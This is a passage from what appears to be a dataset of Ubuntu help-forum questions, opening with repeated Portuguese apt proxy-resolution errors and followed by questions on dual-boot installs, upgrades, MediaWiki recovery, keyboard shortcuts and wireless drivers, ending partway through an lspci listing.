' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/universe translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/universe translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/release.gpg algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //extras.ubuntu.com/ubuntu/dists/precise/release.gpg algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //archive.canonical.com/ubuntu/dists/precise/release.gpg algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/release.gpg algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/release.gpg algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //extras.ubuntu.com/ubuntu/dists/precise/main/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //extras.ubuntu.com/ubuntu/dists/precise/main/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //archive.canonical.com/ubuntu/dists/precise/partner/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //archive.canonical.com/ubuntu/dists/precise/partner/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/release.gpg algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //extras.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //extras.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //extras.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //extras.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //archive.canonical.com/ubuntu/dists/precise/partner/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //archive.canonical.com/ubuntu/dists/precise/partner/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //archive.canonical.com/ubuntu/dists/precise/partner/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //archive.canonical.com/ubuntu/dists/precise/partner/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/main/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/restricted/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/universe/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/multiverse/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/main/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/restricted/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/universe/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/multiverse/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/main/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/main/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/main/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/main/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/main/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/universe/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/source/sources algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/main/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/universe/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/binary-i386/packages algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/restricted/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/restricted/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/restricted/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/restricted/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/universe/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/universe/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/universe/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise/universe/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/main/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/main/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/main/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/main/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/main/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/main/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/main/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/main/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/main/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/main/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/main/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/main/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/universe/i18n/translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/universe/i18n/translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/universe/i18n/translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) w : falhou obter http : //pt.archive.ubuntu.com/ubuntu/dists/precise-security/universe/i18n/translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) e : alguns arquivos index falharam ao ser baixados . eles foram ignorados , ou cópias antigas são usadas ao invés .
125558	how to install fresh 12.04 install to a pc with dual booting windows 7 & ubuntu11.10 ?	my laptop is already dual booting with windows 7 & ubuntu 11.10 , with ubuntu grub bootloader . i would like to go fer a fresh ubuntu 12.04 installation , without disturbing the windows 7 boot record info in the current 11.10 's grub . if i install ub 12.04 , will the new grub have the windows 7 option automatically loaded ? restoring win7 boot and then going for fresh 12.04 install is very risky , i believe . i want this with very minimum possible damage . please help me out . regards , user
125559	upgrades from previous versions	i have couple of questions about upgrades : why is ubuntu still including the release name in the sources.list ? the package manager could get this information from /etc/lsb-release . and it 's really not necessary to change this file every time one upgrades . is there a way to list packages installed by the user ? it would be useful to be able to quickly install everything one had installed in previous releases , without installing system level packages that are no longer used by the distribution ( such as hal ) .
125561	recover lost mediawiki	i have a mysql installation of mediawiki , hosted with thrustvps . something has become corrupted on the server , and it is in a non-bootable state . i do n't have physical access to the machine , but their techs offered to back up any folders i need to to recover my site and then rebuild my machine . the problem is , i do n't know what folders i need to save to restore my wiki . all the backup instructions i have seen require console access to the machine . clearly , i should have done that before ( and was planning on it so i could move hosting providers ) , but did n't . if anyone knows what i need to recover , i 'd appreciate it . ( i installed everything with the defaults whenever possible )
125565	tapping alt brings up love handles , not the hud	just upgraded from 11.10 to 12.04 and wanted to test out some of the new keyboard shortcuts . i probably have some config files sitting around from my 11.10 install , in particular i think i may have set alt to bring up love handles on my windows so i could resize them easier when using my trackpad on my laptop . now it seems that the hud has been assigned to tap alt ( at least according to the shortcut cheat sheet when i long press on super ) but when i tap alt all i get is love handles on my focused window . do n't get me wrong , the love handles are excellent and i 'd like to keep one of my keys as a shortcut to bringing them up to resize windows , but i would like to try out the hud as well ... where can i go to reset these keyboard shortcuts ?
125567	wirless disabled by hardware switch on a toshiba notebook model : nb205-n311/w	i 've got a toshiba notebook model : nb205-n311/w it has no external wireless hardware switch . it can only be switched on when pressing on fn+f8 ( on windows xp ) when i tried doing the same thing on ubuntu 11.10 it did n't work . i need help in switching it on . my wireless wont work until i switch it on ? ? ? please ! !
125570	broadcom 4315 stop working after upgrade to 12.04	lspci -n | grep 14e4 02:00.0 0280 : 14e4:4315 ( rev 01 ) lspci -vvv 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) subsystem : hewlett-packard company device 3072 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- serr- kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company device 3072 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- serr- [ disabled ] capabilities : kernel driver in use : i915 kernel modules : i915 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) subsystem : hewlett-packard company device 3072 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- serr- 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) ( prog-if 00 [ uhci ] ) subsystem : hewlett-packard company device 3072 control : i/o+ mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- serr- kernel driver in use : uhci_hcd 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) ( prog-if 00 [ uhci ] ) subsystem : hewlett-packard company device 3072 control : i/o+ mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- serr- kernel driver in use : uhci_hcd 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) ( prog-if 00 [ uhci ] ) subsystem : hewlett-packard company device 3072 control : i/o+ mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- serr- kernel driver in use : uhci_hcd 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) ( prog-if 20 [ ehci ] ) subsystem : hewlett-packard company device 3072 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- serr- kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) subsystem : hewlett-packard company device 3073 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- tabort- reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) ( prog-if 00 [ normal decode ] ) control : 